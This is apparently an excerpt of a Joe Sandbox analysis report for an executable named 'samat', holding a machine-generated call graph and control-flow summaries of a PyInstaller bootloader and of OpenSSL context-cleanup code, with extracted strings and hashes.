80588->80591 80590 7ff8b7fe6880 14 API calls 80589->80590 80592 7ff8b804724d 80590->80592 80591->80592 80593 7ff8b804725f memset 80592->80593 80594 7ff8b80472a7 80592->80594 80593->80594 80594->80508 80594->80525 80596 7ff8b8048f5c 80595->80596 80598 7ff8b8048e69 80595->80598 80596->80452 80598->80596 80898 7ff8b802e7e0 15 API calls 80598->80898 80899 7ff8b8041740 15 API calls 80598->80899 80900 7ff8b80659c0 15 API calls 80598->80900 80901 7ff8b802d150 15 API calls 80598->80901 80602->80470 80603->80525 80604->80525 80605->80525 80606->80525 80608 7ff8b7fe6840 80607->80608 80609 7ff8b7fe6180 new[] 14 API calls 80608->80609 80610 7ff8b7fe68ad 80608->80610 80611 7ff8b7fe6855 80609->80611 80610->80476 80612 7ff8b7fe6865 80611->80612 80902 7ff8b7fe6c40 14 API calls 80611->80902 80612->80476 80614->80492 80615->80525 80616->80525 80617->80506 80618->80525 80903 7ff8b7fe90a0 80619->80903 80622->80488 80623->80482 80624->80507 80625->80507 80626->80530 80627->80530 80628->80530 80629->80549 80630->80519 80631->80525 80632->80541 80633->80528 80634->80549 80635->80549 80636->80540 80637->80549 80638->80523 80639->80534 80640->80545 80641->80548 80642->80551 80643->80553 80644->80557 80645->80549 80646->80445 80647->80447 80649 7ff8b80648ca 80648->80649 80652 7ff8b80648da 80648->80652 80654 7ff8b80643d0 80649->80654 80651 7ff8b806492d 80651->80572 80652->80651 80653 7ff8b80643d0 76 API calls 80652->80653 80653->80652 80686 7ff8b80640d0 80654->80686 80656 7ff8b80644ba 80660 7ff8b8112900 8 API calls 80656->80660 80657 7ff8b806485b 80750 7ff8b8041280 16 API calls 80657->80750 80661 7ff8b806487b 80660->80661 80661->80652 80662 7ff8b806448c 80662->80656 80666 7ff8b8064578 80662->80666 80670 7ff8b806455e 80662->80670 80745 7ff8b8003790 38 API calls 80662->80745 80664 7ff8b8064514 80665 7ff8b806451a 80664->80665 80664->80666 80668 7ff8b7fe6880 14 API calls 80665->80668 80665->80670 80667 7ff8b806461d 80666->80667 80672 7ff8b80645e1 80666->80672 80669 7ff8b7fe6880 14 API calls 80667->80669 80671 7ff8b8064547 80668->80671 80679 7ff8b8064601 80669->80679 80670->80656 80670->80657 80749 7ff8b7fe6c40 14 API calls 80670->80749 80671->80670 80675 7ff8b806454f memcpy 80671->80675 80673 7ff8b806473c 80672->80673 80674 7ff8b80646f6 80672->80674 80672->80679 80677 7ff8b7fe9170 14 API calls 80673->80677 80676 7ff8b7fe6880 14 API calls 80674->80676 80675->80670 80676->80679 80678 7ff8b806477b 80677->80678 80717 7ff8b805cf30 80678->80717 80679->80670 80748 7ff8b8004b80 47 API calls 80679->80748 80682 7ff8b80647a7 80683 7ff8b80647d5 80682->80683 80746 7ff8b803e490 75 API calls 80682->80746 80683->80679 80747 7ff8b8041310 16 API calls 80683->80747 80687 7ff8b80640f2 80686->80687 80705 7ff8b8064384 80686->80705 80688 7ff8b80640fb 80687->80688 80692 7ff8b8064113 80687->80692 80787 7ff8b8063fc0 14 API calls 80688->80787 80690 7ff8b8064106 80690->80662 80693 7ff8b8064152 80692->80693 80698 7ff8b8064303 80692->80698 80694 7ff8b80641a4 80693->80694 80788 7ff8b8063fc0 14 API calls 80693->80788 80751 7ff8b8064c70 memset 80694->80751 80697 7ff8b8064213 80699 7ff8b8064258 80697->80699 80697->80705 80707 7ff8b80642a2 80697->80707 80698->80705 80794 7ff8b8063fc0 14 API calls 80698->80794 80792 7ff8b7fe9340 14 API calls 80699->80792 80702 7ff8b806420b 80789 7ff8b7fe6c40 14 API calls 80702->80789 80703 7ff8b8064215 80703->80697 80790 7ff8b80a3ba0 17 API calls 80703->80790 80704 7ff8b8064269 80793 7ff8b7fe9340 14 API calls 80704->80793 80705->80662 80708 7ff8b8015950 64 API calls 80707->80708 80714 7ff8b80642ce 80708->80714 80711 7ff8b8064293 80711->80662 80712 7ff8b8064226 80791 7ff8b8063fc0 14 API calls 80712->80791 80715 7ff8b80a22e0 44 API calls 80714->80715 80716 7ff8b80642f4 80715->80716 80716->80662 80718 7ff8b805cf66 80717->80718 80719 7ff8b805cf5d 80717->80719 80718->80719 80743 7ff8b805cfd0 80718->80743 80875 7ff8b7fe9340 14 API calls 80719->80875 80721 7ff8b805cf95 80876 7ff8b7fe9340 14 API calls 80721->80876 80723 7ff8b805cfbf 80723->80682 80724 7ff8b805d3dd 80726 7ff8b8015950 64 API calls 80724->80726 80727 7ff8b805d43d 80724->80727 80726->80727 80730 7ff8b805d574 80727->80730 80882 7ff8b80a3ba0 17 API calls 80727->80882 80730->80682 80732 7ff8b805d56c 80732->80730 80734 7ff8b7fe6180 new[] 14 API calls 80732->80734 80733 7ff8b7fe6880 14 API calls 80733->80743 80735 7ff8b805d595 80734->80735 80735->80730 80737 7ff8b805d59d memcpy 80735->80737 80736 7ff8b805d3f1 80881 7ff8b80159e0 64 API calls 80736->80881 80737->80730 80741 7ff8b805d3df 80880 7ff8b7fe6c40 14 API calls 80741->80880 80743->80724 80743->80733 80743->80736 80743->80741 80744 7ff8b80640d0 72 API calls 80743->80744 80841 7ff8b8065220 80743->80841 80853 7ff8b8018f60 80743->80853 80877 7ff8b801a040 17 API calls 80743->80877 80878 7ff8b80114a0 17 API calls 80743->80878 80879 7ff8b80159e0 64 API calls 80743->80879 80744->80743 80745->80664 80746->80683 80747->80679 80748->80670 80749->80657 80750->80656 80752 7ff8b8064d43 80751->80752 80753 7ff8b8064d7d 80752->80753 80754 7ff8b8064d5f 80752->80754 80760 7ff8b8064e77 80753->80760 80773 7ff8b8064e52 80753->80773 80813 7ff8b7fea500 14 API calls 80754->80813 80757 7ff8b8064f3b 80795 7ff8b809fc80 80757->80795 80759 7ff8b80651f6 80763 7ff8b8112900 8 API calls 80759->80763 80760->80757 80761 7ff8b8064eaa 80760->80761 80762 7ff8b8064eb3 80761->80762 80766 7ff8b8064edb 80761->80766 80815 7ff8b7fea370 18 API calls 80762->80815 80764 7ff8b80641e2 80763->80764 80764->80697 80764->80702 80764->80703 80767 7ff8b7fe6880 14 API calls 80766->80767 80776 7ff8b8064f14 80766->80776 80768 7ff8b8064eec 80767->80768 80770 7ff8b8064ef4 memcpy 80768->80770 80768->80776 80769 7ff8b8064fce 80771 7ff8b8065125 80769->80771 80820 7ff8b80159e0 64 API calls 80769->80820 80772 7ff8b809fc80 15 API calls 80770->80772 80780 7ff8b8064d70 80771->80780 80821 7ff8b7fea370 18 API calls 80771->80821 80772->80776 80814 7ff8b7fea370 18 API calls 80773->80814 80775 7ff8b7fe6880 14 API calls 80779 7ff8b8064f9d 80775->80779 80776->80775 80783 7ff8b8064fba 80776->80783 80781 7ff8b8064fa5 memcpy 80779->80781 80779->80783 80822 7ff8b80649c0 15 API calls 80780->80822 80781->80783 80783->80769 80783->80780 80816 7ff8b8003790 38 API calls 80783->80816 80817 7ff8b7fe6c40 14 API calls 80783->80817 80818 7ff8b8041280 16 API calls 80783->80818 80819 7ff8b8004b80 47 API calls 80783->80819 80787->80690 80788->80694 80789->80697 80790->80712 80791->80697 80792->80704 80793->80711 80794->80705 80797 7ff8b809fcd1 80795->80797 80800 7ff8b80a0099 80797->80800 80801 7ff8b809ffde 80797->80801 80823 7ff8b809f0f0 80797->80823 80798 7ff8b80a00f0 80834 7ff8b7fe9340 14 API calls 80798->80834 80833 7ff8b7fea500 14 API calls 80800->80833 80801->80798 80803 7ff8b80a010d 80801->80803 80804 7ff8b7fe9170 14 API calls 80801->80804 80806 7ff8b80a01ae 80803->80806 80835 7ff8b8041740 15 API calls 80803->80835 80804->80798 80812 7ff8b80a0207 80806->80812 80836 7ff8b8075d70 15 API calls 80806->80836 80807 7ff8b8112900 8 API calls 80809 7ff8b80a0250 80807->80809 80809->80776 80810 7ff8b80a01d5 80810->80812 80837 7ff8b802d150 15 API calls 80810->80837 80812->80807 80813->80780 80814->80780 80815->80780 80816->80783 80817->80783 80818->80783 80819->80783 80820->80771 80821->80780 80822->80759 80829 7ff8b809f133 80823->80829 80824 7ff8b809f20b 80832 7ff8b809f229 80824->80832 80838 7ff8b809c2c0 14 API calls 80824->80838 80825 7ff8b809f24d 80827 7ff8b809f280 80825->80827 80828 7ff8b809f293 80825->80828 80825->80832 80839 7ff8b7fea500 14 API calls 80827->80839 80840 7ff8b7fea500 14 API calls 80828->80840 80829->80824 80829->80825 80832->80797 80833->80801 80834->80803 80836->80810 80837->80812 80838->80832 80839->80832 80840->80832 80842 7ff8b80652ae 80841->80842 80843 7ff8b8065258 80841->80843 80842->80843 80844 7ff8b80652d0 80842->80844 80883 7ff8b7fe9340 14 API calls 80843->80883 80845 7ff8b8065270 80844->80845 80850 7ff8b80652d5 80844->80850 80884 7ff8b7fe9340 14 API calls 80845->80884 80848 7ff8b806529a 80848->80743 80849 7ff8b8064c70 71 API calls 80849->80850 80850->80849 80851 7ff8b80653cd 80850->80851 80885 7ff8b804b040 16 API calls 80850->80885 80851->80743 80854 7ff8b8018f74 80853->80854 80855 7ff8b8018f87 80853->80855 80886 7ff8b7fe9340 14 API calls 80854->80886 80857 7ff8b8018f9d 80855->80857 80887 7ff8b7fe9340 14 API calls 80855->80887 80858 7ff8b8018f85 80857->80858 80860 7ff8b8018fe1 80857->80860 80888 7ff8b7fe9340 14 API calls 80858->80888 80889 7ff8b8018cd0 64 API calls 80860->80889 80862 7ff8b8018fd4 80862->80743 80865 7ff8b8019066 80870 7ff8b8019072 80865->80870 80893 7ff8b80114a0 17 API calls 80865->80893 80867 7ff8b8019005 80867->80865 80871 7ff8b8019061 80867->80871 80890 7ff8b8065440 71 API calls 80867->80890 80891 7ff8b8017e50 64 API calls 80867->80891 80892 7ff8b8018cd0 64 API calls 80867->80892 80870->80871 80872 7ff8b7fe6880 14 API calls 80870->80872 80871->80743 80873 7ff8b80190eb 80872->80873 80873->80871 80874 7ff8b80190f3 memcpy 80873->80874 80874->80871 80875->80721 80876->80723 80877->80743 80878->80743 80879->80743 80880->80724 80881->80724 80882->80732 80883->80845 80884->80848 80885->80850 80886->80858 80887->80857 80888->80862 80889->80867 80890->80867 80891->80867 80892->80867 80893->80870 80894->80586 80895->80578 80896->80583 80897->80583 80898->80598 80900->80598 80901->80598 80902->80612 80912 7ff8b7fe6ec0 80903->80912 80905 7ff8b7fe913f 80908 7ff8b8112900 8 API calls 80905->80908 80910 7ff8b7fe9152 80908->80910 80910->80481 80911 7ff8b7fe9126 80911->80905 80925 7ff8b7fe6c40 14 API calls 80911->80925 80914 7ff8b7fe6f09 80912->80914 80913 7ff8b8112900 8 API calls 80915 7ff8b7fe8643 80913->80915 80916 7ff8b7fe6f93 80914->80916 80917 7ff8b7fe6f83 80914->80917 80921 7ff8b7fe6fd1 80914->80921 80922 7ff8b7fe6f91 80914->80922 80915->80911 80924 7ff8b7fe8cc0 14 API calls new[] 80915->80924 80920 7ff8b7fe6f97 memcpy 80916->80920 80916->80922 80926 7ff8b7fe8bf0 14 API calls 80917->80926 80920->80922 80921->80913 80923 7ff8b7fe7323 80921->80923 80922->80921 80927 7ff8b7fe8bf0 14 API calls 80922->80927 80924->80911 80925->80905 80926->80922 80927->80921 80928->80567 80929 7ff8b834cd30 80930 7ff8b834d0b0 80929->80930 80931 7ff8b834cd39 80929->80931 80931->80930 80932 7ff8b834cd80 CRYPTO_free CRYPTO_free 80931->80932 80933 7ff8b834cdcf 80932->80933 80934 7ff8b834cdd9 7 API calls 80932->80934 80933->80934 80953 7ff8b83311db 80934->80953 80936 7ff8b834ce32 OPENSSL_sk_pop_free OPENSSL_sk_pop_free OPENSSL_sk_pop_free OPENSSL_sk_free 80937 7ff8b834ce86 80936->80937 80938 7ff8b834ce92 CRYPTO_free CRYPTO_free CRYPTO_free CRYPTO_free CRYPTO_secure_free 80937->80938 80939 7ff8b834cf1b EVP_MD_get0_provider 80938->80939 80940 7ff8b834cf30 80938->80940 80939->80940 80941 7ff8b834cf28 EVP_MD_free 80939->80941 80942 7ff8b834cf3c EVP_MD_get0_provider 80940->80942 80943 7ff8b834cf51 80940->80943 80941->80940 80942->80943 80944 7ff8b834cf49 EVP_MD_free 80942->80944 80945 7ff8b834cf68 EVP_CIPHER_get0_provider 80943->80945 80947 7ff8b834cf87 80943->80947 80944->80943 80945->80943 80946 7ff8b834cf75 EVP_CIPHER_free 80945->80946 80946->80943 80948 7ff8b834cf9c EVP_MD_get0_provider 80947->80948 80949 7ff8b834cfbb 80947->80949 80948->80947 80950 7ff8b834cfa9 EVP_MD_free 80948->80950 80951 7ff8b834d03a CRYPTO_free CRYPTO_free CRYPTO_THREAD_lock_free CRYPTO_free CRYPTO_free 80949->80951 80952 7ff8b834cfd1 CRYPTO_free CRYPTO_free CRYPTO_free 80949->80952 80950->80947 80951->80930 80952->80951 80952->80952 80953->80936 80955 7ff8b83439b0 80953->80955 80954 7ff8b8343b0f 80954->80936 80955->80954 80956 7ff8b83439e0 EVP_PKEY_free 80955->80956 80957 7ff8b8343a03 X509_free EVP_PKEY_free OPENSSL_sk_pop_free CRYPTO_free 80956->80957 80957->80957 80958 7ff8b8343a57 CRYPTO_free CRYPTO_free CRYPTO_free X509_STORE_free X509_STORE_free 80957->80958 80959 7ff8b83318f2 80958->80959 80960 7ff8b8343ad5 CRYPTO_free CRYPTO_THREAD_lock_free CRYPTO_free 80959->80960 80960->80954

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 0 7ff7e12c1000-7ff7e12c3806 call 7ff7e12cfe18 call 7ff7e12cfe20 call 7ff7e12cc850 call 7ff7e12d53f0 call 7ff7e12d5484 call 7ff7e12c36b0 14 7ff7e12c3814-7ff7e12c3836 call 7ff7e12c1950 0->14 15 7ff7e12c3808-7ff7e12c380f 0->15 20 7ff7e12c383c-7ff7e12c3856 call 7ff7e12c1c80 14->20 21 7ff7e12c391b-7ff7e12c3931 call 7ff7e12c45c0 14->21 16 7ff7e12c3c97-7ff7e12c3cb2 call 7ff7e12cc550 15->16 25 7ff7e12c385b-7ff7e12c389b call 7ff7e12c8830 20->25 28 7ff7e12c3933-7ff7e12c3960 call 7ff7e12c7f90 21->28 29 7ff7e12c396a-7ff7e12c397f call 7ff7e12c2710 21->29 34 7ff7e12c38c1-7ff7e12c38cc call 7ff7e12d4f30 25->34 35 7ff7e12c389d-7ff7e12c38a3 25->35 37 7ff7e12c3962-7ff7e12c3965 call 7ff7e12d004c 28->37 38 7ff7e12c3984-7ff7e12c39a6 call 7ff7e12c1c80 28->38 39 7ff7e12c3c8f 29->39 47 7ff7e12c38d2-7ff7e12c38e1 call 7ff7e12c8830 34->47 48 7ff7e12c39fc-7ff7e12c3a2a call 7ff7e12c8940 call 7ff7e12c89a0 * 3 34->48 40 7ff7e12c38af-7ff7e12c38bd call 7ff7e12c89a0 35->40 41 7ff7e12c38a5-7ff7e12c38ad 35->41 37->29 53 7ff7e12c39b0-7ff7e12c39b9 38->53 39->16 40->34 41->40 57 7ff7e12c39f4-7ff7e12c39f7 call 7ff7e12d4f30 47->57 58 7ff7e12c38e7-7ff7e12c38ed 47->58 76 7ff7e12c3a2f-7ff7e12c3a3e call 7ff7e12c8830 48->76 53->53 56 7ff7e12c39bb-7ff7e12c39d8 call 7ff7e12c1950 53->56 56->25 68 7ff7e12c39de-7ff7e12c39ef call 7ff7e12c2710 56->68 57->48 62 7ff7e12c38f0-7ff7e12c38fc 58->62 65 7ff7e12c3905-7ff7e12c3908 62->65 66 7ff7e12c38fe-7ff7e12c3903 62->66 65->57 69 7ff7e12c390e-7ff7e12c3916 call 7ff7e12d4f30 65->69 66->62 66->65 68->39 69->76 79 7ff7e12c3b45-7ff7e12c3b53 76->79 80 7ff7e12c3a44-7ff7e12c3a47 76->80 81 7ff7e12c3b59-7ff7e12c3b5d 79->81 82 7ff7e12c3a67 79->82 80->79 83 7ff7e12c3a4d-7ff7e12c3a50 80->83 84 7ff7e12c3a6b-7ff7e12c3a90 call 7ff7e12d4f30 81->84 82->84 85 7ff7e12c3a56-7ff7e12c3a5a 83->85 86 7ff7e12c3b14-7ff7e12c3b17 83->86 95 7ff7e12c3a92-7ff7e12c3aa6 call 7ff7e12c8940 84->95 96 7ff7e12c3aab-7ff7e12c3ac0 84->96 85->86 90 7ff7e12c3a60 85->90 87 7ff7e12c3b2f-7ff7e12c3b40 call 7ff7e12c2710 86->87 88 7ff7e12c3b19-7ff7e12c3b1d 86->88 97 7ff7e12c3c7f-7ff7e12c3c87 87->97 88->87 91 7ff7e12c3b1f-7ff7e12c3b2a 88->91 90->82 91->84 95->96 99 7ff7e12c3ac6-7ff7e12c3aca 96->99 100 7ff7e12c3be8-7ff7e12c3bfa call 7ff7e12c8830 96->100 97->39 102 7ff7e12c3ad0-7ff7e12c3ae8 call 7ff7e12d5250 99->102 103 7ff7e12c3bcd-7ff7e12c3be2 call 7ff7e12c1940 99->103 108 7ff7e12c3c2e 100->108 109 7ff7e12c3bfc-7ff7e12c3c02 100->109 113 7ff7e12c3b62-7ff7e12c3b7a call 7ff7e12d5250 102->113 114 7ff7e12c3aea-7ff7e12c3b02 call 7ff7e12d5250 102->114 103->99 103->100 115 7ff7e12c3c31-7ff7e12c3c40 call 7ff7e12d4f30 108->115 111 7ff7e12c3c04-7ff7e12c3c1c 109->111 112 7ff7e12c3c1e-7ff7e12c3c2c 109->112 111->115 112->115 124 7ff7e12c3b87-7ff7e12c3b9f call 7ff7e12d5250 113->124 125 7ff7e12c3b7c-7ff7e12c3b80 113->125 114->103 126 7ff7e12c3b08-7ff7e12c3b0f 114->126 122 7ff7e12c3d41-7ff7e12c3d63 call 7ff7e12c44e0 115->122 123 7ff7e12c3c46-7ff7e12c3c4a 115->123 137 7ff7e12c3d71-7ff7e12c3d82 call 7ff7e12c1c80 122->137 138 7ff7e12c3d65-7ff7e12c3d6f call 7ff7e12c4630 122->138 127 7ff7e12c3c50-7ff7e12c3c5f call 7ff7e12c90e0 123->127 128 7ff7e12c3cd4-7ff7e12c3ce6 call 7ff7e12c8830 123->128 139 7ff7e12c3ba1-7ff7e12c3ba5 124->139 140 7ff7e12c3bac-7ff7e12c3bc4 call 7ff7e12d5250 124->140 125->124 126->103 142 7ff7e12c3c61 127->142 143 7ff7e12c3cb3-7ff7e12c3cbd call 7ff7e12c8660 127->143 144 7ff7e12c3d35-7ff7e12c3d3c 128->144 145 7ff7e12c3ce8-7ff7e12c3ceb 128->145 152 7ff7e12c3d87-7ff7e12c3d96 137->152 138->152 139->140 140->103 154 7ff7e12c3bc6 140->154 149 7ff7e12c3c68 call 7ff7e12c2710 142->149 160 7ff7e12c3cbf-7ff7e12c3cc6 143->160 161 7ff7e12c3cc8-7ff7e12c3ccf 143->161 144->149 145->144 150 7ff7e12c3ced-7ff7e12c3d10 call 7ff7e12c1c80 145->150 162 7ff7e12c3c6d-7ff7e12c3c77 149->162 167 7ff7e12c3d12-7ff7e12c3d26 call 7ff7e12c2710 call 7ff7e12d4f30 150->167 168 7ff7e12c3d2b-7ff7e12c3d33 call 7ff7e12d4f30 150->168 157 7ff7e12c3dc4-7ff7e12c3dda call 7ff7e12c9390 152->157 158 7ff7e12c3d98-7ff7e12c3d9f 152->158 154->103 170 7ff7e12c3de8-7ff7e12c3e04 SetDllDirectoryW 157->170 171 7ff7e12c3ddc 157->171 158->157 164 7ff7e12c3da1-7ff7e12c3da5 158->164 160->149 161->152 162->97 164->157 169 7ff7e12c3da7-7ff7e12c3dbe SetDllDirectoryW LoadLibraryExW 164->169 167->162 168->152 169->157 175 7ff7e12c3f01-7ff7e12c3f08 170->175 176 7ff7e12c3e0a-7ff7e12c3e19 call 7ff7e12c8830 170->176 171->170 180 7ff7e12c4008-7ff7e12c4010 175->180 181 7ff7e12c3f0e-7ff7e12c3f15 175->181 189 7ff7e12c3e32-7ff7e12c3e3c call 7ff7e12d4f30 176->189 190 7ff7e12c3e1b-7ff7e12c3e21 176->190 183 7ff7e12c4012-7ff7e12c402f PostMessageW GetMessageW 180->183 184 7ff7e12c4035-7ff7e12c404a call 7ff7e12c36a0 call 7ff7e12c3360 call 7ff7e12c3670 180->184 181->180 182 7ff7e12c3f1b-7ff7e12c3f25 call 7ff7e12c33c0 181->182 182->162 196 7ff7e12c3f2b-7ff7e12c3f3f call 7ff7e12c90c0 182->196 183->184 209 7ff7e12c404f-7ff7e12c4067 call 7ff7e12c6fc0 call 7ff7e12c6d70 184->209 201 7ff7e12c3ef2-7ff7e12c3efc call 7ff7e12c8940 189->201 202 7ff7e12c3e42-7ff7e12c3e48 189->202 193 7ff7e12c3e23-7ff7e12c3e2b 190->193 194 7ff7e12c3e2d-7ff7e12c3e2f 190->194 193->194 194->189 207 7ff7e12c3f41-7ff7e12c3f5e PostMessageW GetMessageW 196->207 208 7ff7e12c3f64-7ff7e12c3fa7 call 7ff7e12c8940 call 7ff7e12c89e0 call 7ff7e12c6fc0 call 7ff7e12c6d70 call 7ff7e12c88e0 196->208 201->175 202->201 206 7ff7e12c3e4e-7ff7e12c3e54 202->206 210 7ff7e12c3e5f-7ff7e12c3e61 206->210 211 7ff7e12c3e56-7ff7e12c3e58 206->211 207->208 248 7ff7e12c3ff5-7ff7e12c4003 call 7ff7e12c1900 208->248 249 7ff7e12c3fa9-7ff7e12c3fbf call 7ff7e12c8ed0 call 7ff7e12c88e0 208->249 210->175 213 7ff7e12c3e67-7ff7e12c3e83 call 7ff7e12c6dc0 call 7ff7e12c7340 210->213 212 7ff7e12c3e5a 211->212 211->213 212->175 227 7ff7e12c3e85-7ff7e12c3e8c 213->227 228 7ff7e12c3e8e-7ff7e12c3e95 213->228 230 7ff7e12c3edb-7ff7e12c3ef0 call 7ff7e12c2a50 call 7ff7e12c6fc0 call 7ff7e12c6d70 227->230 231 7ff7e12c3eaf-7ff7e12c3eb9 call 7ff7e12c71b0 228->231 232 7ff7e12c3e97-7ff7e12c3ea4 call 7ff7e12c6e00 228->232 230->175 242 7ff7e12c3ec4-7ff7e12c3ed2 call 7ff7e12c74f0 231->242 243 7ff7e12c3ebb-7ff7e12c3ec2 231->243 232->231 246 7ff7e12c3ea6-7ff7e12c3ead 232->246 242->175 256 7ff7e12c3ed4 242->256 243->230 246->230 248->162 249->248 261 7ff7e12c3fc1-7ff7e12c3fd6 249->261 256->230 262 7ff7e12c3ff0 call 7ff7e12c2a50 261->262 263 7ff7e12c3fd8-7ff7e12c3feb call 7ff7e12c2710 call 7ff7e12c1900 261->263 262->248 263->162
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                                                      • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                                                                      • Opcode ID: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d2c99a9177edecaaa5b682b82325fcd493c8c40b473d9cd541dac168e12def1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D325C21B0868291FB19F725DC563F9A669AF44780FC48433DB5D822D6EFBCE558C322

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 269 7ff8b834cd30-7ff8b834cd33 270 7ff8b834cd39-7ff8b834cd5a call 7ff8b8331325 269->270 271 7ff8b834d0b5 269->271 274 7ff8b834d0b0-7ff8b834d0b4 270->274 275 7ff8b834cd60-7ff8b834cdcd call 7ff8b83ad90b CRYPTO_free * 2 270->275 274->271 278 7ff8b834cdcf-7ff8b834cdd4 call 7ff8b8331da2 275->278 279 7ff8b834cdd9-7ff8b834ce2d CRYPTO_free_ex_data OPENSSL_LH_free X509_STORE_free CTLOG_STORE_free OPENSSL_sk_free * 3 call 7ff8b83311db 275->279 278->279 282 7ff8b834ce32-7ff8b834cf19 OPENSSL_sk_pop_free * 3 OPENSSL_sk_free call 7ff8b8331811 call 7ff8b8331032 CRYPTO_free * 4 CRYPTO_secure_free 279->282 287 7ff8b834cf1b-7ff8b834cf26 EVP_MD_get0_provider 282->287 288 7ff8b834cf30-7ff8b834cf3a 282->288 287->288 289 7ff8b834cf28-7ff8b834cf2b EVP_MD_free 287->289 290 7ff8b834cf3c-7ff8b834cf47 EVP_MD_get0_provider 288->290 291 7ff8b834cf51-7ff8b834cf5e 288->291 289->288 290->291 292 7ff8b834cf49-7ff8b834cf4c EVP_MD_free 290->292 293 7ff8b834cf60-7ff8b834cf66 291->293 292->291 294 7ff8b834cf7d-7ff8b834cf85 293->294 295 7ff8b834cf68-7ff8b834cf73 EVP_CIPHER_get0_provider 293->295 294->293 297 7ff8b834cf87-7ff8b834cf8e 294->297 295->294 296 7ff8b834cf75-7ff8b834cf78 EVP_CIPHER_free 295->296 296->294 298 7ff8b834cf94-7ff8b834cf9a 297->298 299 7ff8b834cf9c-7ff8b834cfa7 EVP_MD_get0_provider 298->299 300 7ff8b834cfb1-7ff8b834cfb9 298->300 299->300 302 7ff8b834cfa9-7ff8b834cfac EVP_MD_free 299->302 300->298 301 7ff8b834cfbb-7ff8b834cfcc 300->301 303 7ff8b834cfce 301->303 304 7ff8b834d03a-7ff8b834d0ab CRYPTO_free * 2 CRYPTO_THREAD_lock_free CRYPTO_free * 2 301->304 302->300 305 7ff8b834cfd1-7ff8b834d038 CRYPTO_free * 3 303->305 304->274 305->304 305->305
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: O_free$L_sk_free$D_freeD_get0_providerL_sk_pop_free$E_free$D_lock_freeH_freeO_free_ex_dataO_secure_freeR_freeR_get0_providerX509_
                                                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\ssl_lib.c
